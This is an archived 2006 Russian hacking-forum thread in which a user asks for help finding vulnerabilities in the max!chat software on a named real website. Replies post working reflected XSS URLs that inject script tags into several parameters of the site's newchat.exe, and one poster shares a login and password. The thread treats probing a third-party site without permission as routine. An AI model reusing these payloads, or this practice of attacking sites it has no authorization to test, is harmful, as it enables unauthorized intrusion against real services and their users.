Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   max!chat (https://forum.antichat.xyz/showthread.php?t=16367)

nicklon 23.03.2006 15:51

max!chat
 
Пипл, помогите определить уязвимости в чате на http://max-club.ru/ используется ПО max!chat исходников нигде не видел, в самом чате все режется блин

DRON-ANARCHY 23.03.2006 20:50

Логин и пасс в студию!

а так вообще вот...
_http://www.max-club.ru/cgi/newchat.exe?Get='<script>alert('passive_XSS_by_DRO N-ANARCHY')</script>AuthorizedTop&Room=Enter

DRON-ANARCHY 23.03.2006 20:57

Да и вообще..времени щас протсо нету....
_http://www.max-club.ru/cgi/newchat.exe?TEST=<script>alert('passive_XXS_by_DRO N-ANARCHY')</script>

nicklon 24.03.2006 10:34

подробнее мона?

DRON-ANARCHY 24.03.2006 23:50

Ну что? Получилось?
Кстати, логин и пасс все-таки выложи...

Антошка2003 25.03.2006 02:02

Логин:antichat
пасс:qwe123
_http://www.max-club.ru/cgi/newchat.exe?Com=Go&Get=Info&Login=<script>alert()</script>&Room=Enter&SID=chat
Набит пассивными ксс

DRON-ANARCHY 25.03.2006 14:32

Ну я приблизително это и описал.. там мона и аод Form и под Get и под еще много чего пихать хсс принцип один...


Время: 12:33